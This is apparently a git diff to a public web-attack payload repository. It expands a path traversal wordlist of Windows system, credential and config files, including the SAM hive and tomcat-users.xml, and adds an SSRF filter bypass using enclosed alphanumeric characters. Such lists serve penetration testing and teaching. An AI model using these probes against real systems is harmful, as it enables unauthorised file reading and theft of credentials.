diff --git a/File Inclusion - Path Traversal/Intruders/LFI-WindowsFileCheck.txt b/File Inclusion - Path Traversal/Intruders/LFI-WindowsFileCheck.txt
index 5a4a94d..a56868a 100644
--- a/File Inclusion - Path Traversal/Intruders/LFI-WindowsFileCheck.txt
+++ b/File Inclusion - Path Traversal/Intruders/LFI-WindowsFileCheck.txt
@@ -2,67 +2,68 @@ php://input
C:\boot.ini
C:\WINDOWS\win.ini
C:\WINDOWS\php.ini
+C:\WINDOWS\System32\Config\SAM
C:\WINNT\php.ini
-\xampp\phpMyAdmin\config.inc
-\xampp\phpMyAdmin\phpinfo.php
-\xampp\phpmyadmin\config.inc
-\xampp\phpmyadmin\phpinfo.php
-\xampp\phpmyadmin\config.inc.php
-\xampp\phpMyAdmin\config.inc.php
-\xampp\apache\conf\httpd.conf
-\xampp\FileZillaFTP\FileZilla Server.xml
-\xampp\MercuryMail\mercury.ini
-\mysql\bin\my.ini
-\xampp\php\php.ini
-\xampp\phpMyAdmin\config.inc.php
-\xampp\tomcat\conf\tomcat-users.xml
-\xampp\tomcat\conf\web.xml
-\xampp\sendmail\sendmail.ini
-\xampp\webalizer\webalizer.conf
-\xampp\webdav\webdav.txt
-\xampp\apache\logs\error.log
-\xampp\apache\logs\access.log
-\xampp\FileZillaFTP\Logs
-\xampp\FileZillaFTP\Logs\error.log
-\xampp\FileZillaFTP\Logs\access.log
-\xampp\MercuryMail\LOGS\error.log
-\xampp\MercuryMail\LOGS\access.log
-\xampp\mysql\data\mysql.err
-\xampp\sendmail\sendmail.log
-\apache\log\error.log
-\apache\log\access.log
-\apache\log\error_log
-\apache\log\access_log
-\apache2\log\error.log
-\apache2\log\access.log
-\apache2\log\error_log
-\apache2\log\access_log
-\log\error.log
-\log\access.log
-\log\error_log
-\log\access_log
-\apache\logs\error.log
-\apache\logs\access.log
-\apache\logs\error_log
-\apache\logs\access_log
-\apache2\logs\error.log
-\apache2\logs\access.log
-\apache2\logs\error_log
-\apache2\logs\access_log
-\logs\error.log
-\logs\access.log
-\logs\error_log
-\logs\access_log
-\log\httpd\access_log
-\log\httpd\error_log
-\logs\httpd\access_log
-\logs\httpd\error_log
-\opt\xampp\logs\access_log
-\opt\xampp\logs\error_log
-\opt\xampp\logs\access.log
-\opt\xampp\logs\error.log
-\Program Files\Apache Group\Apache\logs\access.log
-\Program Files\Apache Group\Apache\logs\error.log
-\Program Files\Apache Group\Apache\conf\httpd.conf
-\Program Files\Apache Group\Apache2\conf\httpd.conf
-\Program Files\xampp\apache\conf\httpd.conf
\ No newline at end of file
+C:\xampp\phpMyAdmin\config.inc
+C:\xampp\phpMyAdmin\phpinfo.php
+C:\xampp\phpmyadmin\config.inc
+C:\xampp\phpmyadmin\phpinfo.php
+C:\xampp\phpmyadmin\config.inc.php
+C:\xampp\phpMyAdmin\config.inc.php
+C:\xampp\apache\conf\httpd.conf
+C:\xampp\FileZillaFTP\FileZilla Server.xml
+C:\xampp\MercuryMail\mercury.ini
+C:\mysql\bin\my.ini
+C:\xampp\php\php.ini
+C:\xampp\phpMyAdmin\config.inc.php
+C:\xampp\tomcat\conf\tomcat-users.xml
+C:\xampp\tomcat\conf\web.xml
+C:\xampp\sendmail\sendmail.ini
+C:\xampp\webalizer\webalizer.conf
+C:\xampp\webdav\webdav.txt
+C:\xampp\apache\logs\error.log
+C:\xampp\apache\logs\access.log
+C:\xampp\FileZillaFTP\Logs
+C:\xampp\FileZillaFTP\Logs\error.log
+C:\xampp\FileZillaFTP\Logs\access.log
+C:\xampp\MercuryMail\LOGS\error.log
+C:\xampp\MercuryMail\LOGS\access.log
+C:\xampp\mysql\data\mysql.err
+C:\xampp\sendmail\sendmail.log
+C:\apache\log\error.log
+C:\apache\log\access.log
+C:\apache\log\error_log
+C:\apache\log\access_log
+C:\apache2\log\error.log
+C:\apache2\log\access.log
+C:\apache2\log\error_log
+C:\apache2\log\access_log
+C:\log\error.log
+C:\log\access.log
+C:\log\error_log
+C:\log\access_log
+C:\apache\logs\error.log
+C:\apache\logs\access.log
+C:\apache\logs\error_log
+C:\apache\logs\access_log
+C:\apache2\logs\error.log
+C:\apache2\logs\access.log
+C:\apache2\logs\error_log
+C:\apache2\logs\access_log
+C:\logs\error.log
+C:\logs\access.log
+C:\logs\error_log
+C:\logs\access_log
+C:\log\httpd\access_log
+C:\log\httpd\error_log
+C:\logs\httpd\access_log
+C:\logs\httpd\error_log
+C:\opt\xampp\logs\access_log
+C:\opt\xampp\logs\error_log
+C:\opt\xampp\logs\access.log
+C:\opt\xampp\logs\error.log
+C:\Program Files\Apache Group\Apache\logs\access.log
+C:\Program Files\Apache Group\Apache\logs\error.log
+C:\Program Files\Apache Group\Apache\conf\httpd.conf
+C:\Program Files\Apache Group\Apache2\conf\httpd.conf
+C:\Program Files\xampp\apache\conf\httpd.conf
diff --git a/SSRF injection/Parser & Curl < 7.54.png b/SSRF injection/Parser & Curl < 7.54.png
new file mode 100644
index 0000000..76fe429
Binary files /dev/null and b/SSRF injection/Parser & Curl < 7.54.png differ
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 051d589..4211770 100644
--- a/SSRF injection/README.md
+++ b/SSRF injection/README.md
@@ -91,6 +91,15 @@ requests + browsers : 2.2.2.2
urllib : 3.3.3.3
```
+Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
+```
+http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
+
+List:
+① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
+```
+
+
## SSRF via URL Scheme
Dict://
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
@@ -176,7 +185,9 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
+* [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
+* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
diff --git a/SSRF injection/SSRF_Parser.png b/SSRF injection/SSRF_Parser.png
new file mode 100644
index 0000000..016e5fe
Binary files /dev/null and b/SSRF injection/SSRF_Parser.png differ
diff --git a/XSS injection/Files/SVG_XSS1.svg b/XSS injection/Files/SVG_XSS1.svg
new file mode 100644
index 0000000..9a623c3
--- /dev/null
+++ b/XSS injection/Files/SVG_XSS1.svg
@@ -0,0 +1 @@
+
diff --git a/XSS injection/Files/SVG_XSS2.svg b/XSS injection/Files/SVG_XSS2.svg
new file mode 100644
index 0000000..8bf8ca9
--- /dev/null
+++ b/XSS injection/Files/SVG_XSS2.svg
@@ -0,0 +1 @@
+
diff --git a/XSS injection/Files/SVG_XSS3.svg b/XSS injection/Files/SVG_XSS3.svg
new file mode 100644
index 0000000..b50b893
--- /dev/null
+++ b/XSS injection/Files/SVG_XSS3.svg
@@ -0,0 +1 @@
+
diff --git a/XSS injection/README.md b/XSS injection/README.md
index c7d30fc..f691e18 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -178,6 +178,11 @@ XSS in SVG
XSS in SVG (short)
```
+
+
+
+
+
```
XSS in SWF